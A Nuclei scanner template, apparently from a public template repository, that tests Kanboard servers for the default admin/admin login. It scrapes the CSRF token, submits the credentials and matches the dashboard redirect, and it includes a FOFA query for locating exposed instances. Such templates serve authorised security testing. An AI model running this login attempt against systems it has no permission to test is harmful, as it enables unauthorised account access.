57 lines
1.7 KiB
YAML
57 lines
1.7 KiB
YAML
id: kanboard-default-login
|
|
|
|
info:
|
|
name: Kanboard - Default Login
|
|
author: shelled
|
|
severity: high
|
|
description: Kanboard contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
|
|
reference:
|
|
- https://twitter.com/0x_rood/status/1607068644634157059
|
|
- https://github.com/kanboard/kanboard
|
|
- https://docs.kanboard.org/v1/admin/installation/
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
|
|
cvss-score: 8.3
|
|
cwe-id: CWE-522
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
fofa-query: app="Kanboard"
|
|
tags: default-login,kanboard
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /?controller=AuthController&action=login HTTP/1.1
|
|
Host: {{Hostname}}
|
|
- |
|
|
POST /?controller=AuthController&action=check HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
username={{user}}&password={{pass}}&csrf_token={{csrf_token}}
|
|
|
|
attack: pitchfork
|
|
payloads:
|
|
user:
|
|
- admin
|
|
pass:
|
|
- admin
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: csrf_token
|
|
part: body
|
|
group: 1
|
|
regex:
|
|
- "hidden\" name=\"csrf_token\" value=\"([0-9a-z]+)\""
|
|
internal: true
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- contains(location, 'controller=DashboardController&action=show')
|
|
- status_code == 302
|
|
condition: and
|
|
|
|
# digest: 490a00463044022047f67428ebc3b14e60b9cf35b3acdea2db7e3db9907da301543428254514192e0220703fb43e80180413b77a21868719a66d64a48234e9d5987d843f67a0482860e4:922c64590222798bb761d5b6d8e72950
|